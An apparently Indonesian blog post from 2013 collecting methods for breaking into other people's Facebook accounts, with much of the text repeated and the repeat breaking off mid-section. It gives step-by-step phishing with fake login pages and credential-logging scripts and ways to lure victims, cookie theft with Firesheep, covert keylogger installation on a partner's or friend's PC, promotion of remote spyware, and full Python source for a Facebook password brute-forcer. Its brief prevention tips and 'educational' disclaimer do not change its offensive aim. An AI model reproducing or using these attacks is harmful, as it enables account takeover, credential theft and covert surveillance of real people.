Sunday, 17 February 2013
Metode Hacking Facebook
METODE HACKING FACEBOOK
Tutorial ini semata-mata hanya untuk tujuan edukasi....
Berikut adalah kumpulan lengkap berbagai cara hack facebook:
CARA HACK FACEBOOK DENGAN METODE FAKE LOGIN / PHISING / SCAM
PERTAMA:
Cara ini paling banyak digunakan dan terbukti efektif untuk meng-hack facebook, sebenarnya metodenya simple saja, kita tinggal membuat halaman login palsu yang kemudian kita upload ke sebuah website bahkan website gratisan pun bisa, kemudian kita pancing pengguna facebook agar menuju halaman login facebook palsu tersebut,
cara memancing pengguna facebook pun ber macam macam bisa lewat email palsu yang mengatasnamakan facebook, link login palsu dan metode social engineering lainnya. Cara mencegah hack facebook dengan metode ini :
sebelum anda login atau memasukkan username dan password anda pastikan bahwa alamat url tersebut benar, jika anda tidak yakin buka saja sebuah jendela baru, masukan alamat facebook (http://www.facebook.com) dan login melalui jendela tersebut. pastikan keaslian email yang mengatasnamakan facebook yang memancing anda agar login facebook yang masuk ke inbox anda, atau abaikan saja email tersebut.
KEDUA:
Facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun.
hampir-hampir saja facebook diharamkan.
1. Silahkan anda daftar di http://www.united.net.kg/ atau http://www.globalweb.com.ru/hosting.php atauhttp://biz.ht/
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com
2. setelah anda berhasil mendaftar, masuk ke FILE MANAGER…hapus file index.html.(akan ada di Cpanelmasing2 nantinya)
3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
ukuran cuma 9kb.
4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di web hosting yang tadi anda sudah daftar.
5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]
6, alright! selesai sampai di sini. . .
untuk penyebarannya silahkan dengan cara masing2…
disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di domain webhosting kalian..ambil URL nya.. [penting]
terus untuk pengguna firefox: buka tools>option>main
preview:
disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.
atau..
bisa juga menyebarkan dengan cara seperti ini
kamu buat account baru,di yahoo,gmail,ato sejenisnya
dengan nick Facebook@ or something like that.
diatas cm contoh…silahkan kamu buat seni sendiri
enjoy..
mudahkan ??
semoga berhasil . . ..
KETIGA:
Yang paling penting siapin dulu web hosting buat naruh file fake login bisa yang gratis atau bayar terserah kalian pilih yg mana.,.,.,.,.,.,
1. download dan extract file index.html download dulu disini
2. download dan extract file logs.php download dulu disini
3. download dan extract file log.txt download dulu disini
Password : Flow
dah disiapin belum web hostingnya? ql belum aku saran mending pakek ripway.
nah kalau sudah registrasi, kalian upload dech file file yang kalian extract tadi.,.,.,.,.
pengertian:
- index.html : Halaman utama login palsu, alamat ini yang kalian sebar ke target.
Ex: http://h1.ripway.com/nama_kalian/index.html
- logs.php : Berfungsi untuk mengirimkam hasil hack dari index.html ke logs.txt
- logs.txt : Berfungsi untuk menampung hasil jerih payah kita
Ex: Email + Password Facebook.
sebarin dech alamat Fake Login kita tadi (index.html),.,.,.,
tinggal tunggu orang yang terlalu ceroboh login pakek Fake login kita.
saran bagi facebook’er :
1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com
2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.
3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’
4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.
5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. bila terlanjur cepat ganti password kalian,.,.,.,.
CARA HACK FACEBOOK DENGAN NETWORK SNIFFING
PERTAMA:
Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan mudah membobol akun facebook dengan memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman.
KEDUA:
Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak terenkripsi jaringan nirkabel terbuka.
cara menggunakanya sebagai berikut:
1. Download .xpi file di http://codebutler.github.com/firesheep/
2. install file .xpi tersebut
3. Install WinPcap, download di www.winpcap.org
4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep
5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6. klik “Start Capturing”
7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website facebook maka firesheep akan siap menghack cookies nya.
nah gimana cara mencegah pencurian password dengan firesheep ini?
kamu dapat menggunakan software ForceTLS, download di https://addons.mozilla.org/en-US/firefox/addon/force-tls/
KETIGA:
Bismillah,
pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan soal sebagai berikut:
Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark, tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini:
mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook;
memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap.
Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar semua data ditangkap. Biasanya default dari program sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap.
Untuk (2) tujuannya adalah untuk melihat pola “serangan” port scanning yang dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara berurutan?
langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini:
pertama-tama buka aplikasi wireshark
kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I
pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada interface yang ingin Anda sadap paket datanya.
pada bagian “Capture filter” masukkan sebagai berikut(ganti alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk melakukan penyadapan paket data)
host www.facebook.com and host alamat.ip.komputer.anda
Klik start, maka proses penyadapan akan segera dimulai
Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e
Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti contoh berikut:
hasil statistik sniffing paket data facebook
Pada data yang saya sadap dengan menggunakan wireshark ini paket data dari facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda caching yang ada pada browser yang saya gunakan untuk membuka facebook masih menyimpan data-data yang diperlukan sehingga data cukup kecil.
sekian postingan kali ini.
CARA HACK FACEBOOK DENGAN KEYLOGGER
PERTAMA:
Kembali lagi bagi anda yang menggunakan akses internet dari warnet atau hotspot dan mungkin juga di kampus atau di kantor harap berhati-hati. cara hack facebook dengan metode ini juga cukup mudah, tinggal pasang software keylogger yang berfungsi untuk merekam aktifitas penggunaan keyboard dan kemudian menggunakan data tersebut untuk mendapatkan username dan password facebook. seseorang bisa saja memasang software keylogger ke laptop atau pc anda atau menyebar trojan kedalam komputer di dalam sebuah jaringan komputer yang tidak aman. cara mencegahnya : pastikan antivirus pada komputer anda selalu up to date.
KEDUA:
Hai facebook’er! Tutorial facebook kali ini akan menjelaskan cara hack facebook dengan keylogger. Cara’nya gimana? Keylogger itu apa? Keylogger merupakan software yang berfungsi untuk memonitoring kegiatan PC dengan me’record / merekam kegiatan keyboard. Berikut akan dijelasin cara penggunaan’nya. AMPUH! Mau ?
Bagi facebook’er yang belum mempunyai keylogger, bisa download secara gratis disini. Sebenarnya software keylogger itu macam-macam namanya. Yang krisna gunakan yaitu keylogger yang bernama DOUGLAS 1.1.
Sebelum beraksi, pastikan dulu korbannya siapa. apakah PC rumah, PC Temen, PC warnet, PC kantor, atau mungkin PC Pacar/Istri … hahahaha
Kalau sudah pasti, sekarang krisna jelasin dah cara penggunaan’nya.
1. Setelah di download, jangan lupa extract file tersebut. OK ! Setelah file download tersebut di extract, akan ada 2 folder : Folder DOUGLAS_EN dan Folder DOUGLAS_ES .
2. Hapus aja Folder DOUGLAS_ES, gag penting !!! tanya kenapa ? karena pake bahasa spanyol … hehehe, yang kita gunakan yaitu Folder DOUGLAS_EN, karena menggunakan bahasa Inggris. hihihi …
3. Langkah selanjutnya yaitu buka folder DOUGLAS_EN. Di dalam pasti ada 6 File dan 1 Folder DATA. iya to ?? hohoho
4. Double klik pada file install.exe . Nanti pada proses penginstalan, anda akan diminta memasukan password. Isilah password tersebut, terserah tapi yang mudah di ingat !!
5. Kalau proses penginstalan sudah selesai, terus ???
Nah, santai !!! mendingan sekarang anda bikin kopi + beli mendoan terlebih dahulu. Untuk selanjutnya mudah kok ! hahahaha
Habiz buat kopi + beli mendoan, kita ngapain ??? tidur aja … hahaha
Pastikan keylogger sudah terinstal, untuk menggunakan keylogger tinggal tekan tombol CTRL+ALT+SHIFT+F9 pada keyboard anda …
Untuk melihat informasi yang sudah di rekam oleh keylogger, anda pilih READ INFORMATION. Terus masukkan password yang sama dengan password yang anda masukkan waktu proses penginstalan.
Nah, Selese dah !!! Mudah to ???
Terus kalau di dalamnya kosong / tidak ada informasi apa-apa, itu kenapa ?? Itu disebabkan karena tidak adanya aktifitas. Maksud aktifitas disini yaitu Penggunan PC tersebut.
Contoh : Misal anda sedang facebookan, coba anda logout dari Facebook anda. Pastikan keylogger telah terinstal Di PC tersebut, terus coba anda login kembali dengan memasukkan alamat email dan password facebook anda. Lalu buka keylogger anda dengan menekan tombol CTRL+ALT+SHIFT+F9 … Kemudian pilih READ INFORMATION, lalu masukkan password keylogger anda. Hasilnya apa ??? anda sendiri yang tahu..
Selamat mencoba
KETIGA:
SniperSpy adalah Password Hacking software Remote yang dikombinasikan dengan Remote Install dan Remote Viewing feature. Setelah diinstal pada PC remote, Anda hanya perlu login ke account SniperSpy. Anda secara pribadi dapat melihat aktivitas log dari PC remote! Ini berarti bahwa Anda dapat melihat log dari PC remote dari mana saja di dunia selama Anda memiliki akses internet.
Apakah Anda ingin Spy pada PC Remote? SniperSpy memungkinkan Anda untuk jarak jauh mata-mata setiap PC. Ini adalah satu-satunya perangkat lunak mata-mata remote PC dengan panel kontrol yang AMAN.
Remote PC software Spy juga menyimpan screenshot bersama dengan teks log chatting, website, penekanan tombol dalam bahasa dan banyak lagi. Remotely, melihat aktivitas anak Anda, karyawan atau siapapun menggunakan PC jauh dari Anda. Termasuk LIVE admin perintah dan kontrol.
Fitur SniperSpy :
1. Adalah perangkat lunak mata-mata SniperSpy deployable
2. Gaib Stealth Mode Option. Bekerja dalam mode siluman lengkap. Tidak terdeteksi
3. Log Semua keystrokes
4. Records setiap Password (Email, Login, Instant Messenger dll)
5. Remote Monitor Seluruh Percakapan IM sehingga Anda bisa memata-matai kegiatan IM
6. Menangkap format .jpg ukuran penuh gambar dari jendela aktif
7. Real Time Screen Viewer
8. Remote reboot atau shutdown PC atau memilih untuk logoff pengguna Windows saat ini
9. Lengkap, bypass Firewall apapun
CARA HACK FACEBOOK DENGAN METODE BRUTEFORCE
PERTAMA:
Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan software bruteforce untuk menebak-nebak password facebook sebuah akun dari sebuah file dictionary / kamus atau juga character generator. cara mencegah hack facebook dengan metode ini adalah dengan melindungi alamat email yang anda gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah antara email untuk umum dan email untuk login facebook dan tidak menampilkannya di halam profil facebook anda.
KEDUA:
Postingan tentang hacking facebook.
Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya account tetapi setidaknya pernah dengar nama ini bukan ).
Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada )
Implementasi Facebook Hacking Dengan Brute Force
Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun beragam, mulai dari teknik phising (fake login ), maupun keylogger hanya dengan tujuan untuk mendapatkan account pribadi targetnya.
ok, cukup basa basinya rel…..to the point aja deh
sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap ….
yg musti disiapin sebagai berikut
1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2 berikut.
Facebook BruteForce Script
Simple Dictionary Attack
Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan
2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist Dictionary ataw mungkin bisa cari yg lebih lengkap.
OK, persiapan telah selesai….saatnya ke medan perang……ga deng, maksudnya kita akan melakukan testing.
disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi.
klo ga tau cara bikin hosting silahkan tanya ke google yah )
1.pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload
set_time_limit(0);
kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik hingga code itu menjadi
set_time_limit(500);
2.
$username =”brute@force.org”;
// username korban misalnya target@bego.com hingga pada code menjadi
$username =”target@bego.com”;
3.
$dictionary =”dictionary.txt”;
adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory
Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu directory bernama fb.
Nah setelah kedua file tersebut sukses di upload dalam 1 direktory
setelah sukses, skr tinggal eksekusi tuh via eb address.
misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja di http://xxx.com/images/
jika di eksekusi maka script akan mencoba membruteforce account milik target lo.
Jika dah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya….
And last word, thanks for you attention if u read a simple tutorial.
KETIGA:
Silakan download FbBruteforce:
Berikut Codenya:
#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me ;)
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
_programmer_ = "gunslinger_ "
_version_ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ __| |_ _ _ | | __
| _/ ` |/ __/ _ \ ' \ / _ \ / _ \| |/ /
| || (| | (_| __/ |) | () | () | <
|_| \_,_|\___\___|.__/ \___/ \___/|_|\_\\
bruteforcer...
Programmer : %s
Version : %s''' % (_programmer_, _version_)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy | Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help
Example : %s -u brad@hackme.com-w wordlist.txt"
P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]
def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)
def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()
def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))
def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()
if _name_ == '__main__':
main()
oke hanya itu saja, jangan di salah gunakan oke?????Salam manis:chinta lee :)
Tutorial ini semata-mata hanya untuk tujuan edukasi....
Berikut adalah kumpulan lengkap berbagai cara hack facebook:
CARA HACK FACEBOOK DENGAN METODE FAKE LOGIN / PHISING / SCAM
PERTAMA:
Cara ini paling banyak digunakan dan terbukti efektif untuk meng-hack facebook, sebenarnya metodenya simple saja, kita tinggal membuat halaman login palsu yang kemudian kita upload ke sebuah website bahkan website gratisan pun bisa, kemudian kita pancing pengguna facebook agar menuju halaman login facebook palsu tersebut,
cara memancing pengguna facebook pun ber macam macam bisa lewat email palsu yang mengatasnamakan facebook, link login palsu dan metode social engineering lainnya. Cara mencegah hack facebook dengan metode ini :
sebelum anda login atau memasukkan username dan password anda pastikan bahwa alamat url tersebut benar, jika anda tidak yakin buka saja sebuah jendela baru, masukan alamat facebook (http://www.facebook.com) dan login melalui jendela tersebut. pastikan keaslian email yang mengatasnamakan facebook yang memancing anda agar login facebook yang masuk ke inbox anda, atau abaikan saja email tersebut.
KEDUA:
Facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun.
hampir-hampir saja facebook diharamkan.
1. Silahkan anda daftar di http://www.united.net.kg/ atau http://www.globalweb.com.ru/hosting.php atauhttp://biz.ht/
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com
2. setelah anda berhasil mendaftar, masuk ke FILE MANAGER…hapus file index.html.(akan ada di Cpanelmasing2 nantinya)
3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
ukuran cuma 9kb.
4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di web hosting yang tadi anda sudah daftar.
5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]
6, alright! selesai sampai di sini. . .
untuk penyebarannya silahkan dengan cara masing2…
disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di domain webhosting kalian..ambil URL nya.. [penting]
terus untuk pengguna firefox: buka tools>option>main
preview:
disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.
atau..
bisa juga menyebarkan dengan cara seperti ini
kamu buat account baru,di yahoo,gmail,ato sejenisnya
dengan nick Facebook@ or something like that.
diatas cm contoh…silahkan kamu buat seni sendiri
enjoy..
mudahkan ??
semoga berhasil . . ..
KETIGA:
Yang paling penting siapin dulu web hosting buat naruh file fake login bisa yang gratis atau bayar terserah kalian pilih yg mana.,.,.,.,.,.,
1. download dan extract file index.html download dulu disini
2. download dan extract file logs.php download dulu disini
3. download dan extract file log.txt download dulu disini
Password : Flow
dah disiapin belum web hostingnya? ql belum aku saran mending pakek ripway.
nah kalau sudah registrasi, kalian upload dech file file yang kalian extract tadi.,.,.,.,.
pengertian:
- index.html : Halaman utama login palsu, alamat ini yang kalian sebar ke target.
Ex: http://h1.ripway.com/nama_kalian/index.html
- logs.php : Berfungsi untuk mengirimkam hasil hack dari index.html ke logs.txt
- logs.txt : Berfungsi untuk menampung hasil jerih payah kita
Ex: Email + Password Facebook.
sebarin dech alamat Fake Login kita tadi (index.html),.,.,.,
tinggal tunggu orang yang terlalu ceroboh login pakek Fake login kita.
saran bagi facebook’er :
1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com
2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.
3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’
4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.
5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. bila terlanjur cepat ganti password kalian,.,.,.,.
CARA HACK FACEBOOK DENGAN NETWORK SNIFFING
PERTAMA:
Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan mudah membobol akun facebook dengan memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman.
KEDUA:
Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak terenkripsi jaringan nirkabel terbuka.
cara menggunakanya sebagai berikut:
1. Download .xpi file di http://codebutler.github.com/firesheep/
2. install file .xpi tersebut
3. Install WinPcap, download di www.winpcap.org
4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep
5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6. klik “Start Capturing”
7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website facebook maka firesheep akan siap menghack cookies nya.
nah gimana cara mencegah pencurian password dengan firesheep ini?
kamu dapat menggunakan software ForceTLS, download di https://addons.mozilla.org/en-US/firefox/addon/force-tls/
KETIGA:
Bismillah,
pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan soal sebagai berikut:
Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark, tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini:
mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook;
